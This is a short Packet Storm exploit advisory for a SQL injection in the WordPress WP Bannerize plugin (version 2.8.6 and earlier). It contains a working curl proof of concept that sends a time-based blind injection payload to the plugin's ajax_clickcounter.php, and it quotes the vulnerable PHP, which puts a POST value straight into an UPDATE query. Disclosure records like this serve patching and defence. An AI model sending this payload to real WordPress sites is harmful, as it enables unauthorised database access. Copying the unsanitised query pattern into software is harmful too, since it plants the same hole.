WordPress WP Bannerize 2.8.6 SQL Injection

2011-09-01T00:00:00
ID PACKETSTORM:104670
Type packetstorm
Reporter Miroslav Stampar
Modified 2011-09-01T00:00:00

Description

                                        
                                            `# Exploit Title: WordPress WP Bannerize plugin <= 2.8.6 SQL Injection Vulnerability  
# Date: 2011-08-31  
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)  
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip  
# Version: 2.8.6 (tested)  
  
---  
PoC  
---  
curl --data "id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_clickcounter.php  
  
---------------  
Vulnerable code  
---------------  
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {  
...  
$sql = "UPDATE `" . $wpdb->prefix ."bannerize_b` SET `clickcount` = `clickcount`+1 WHERE id = " . $_POST['id'];  
$result = mysql_query($sql);  
  
`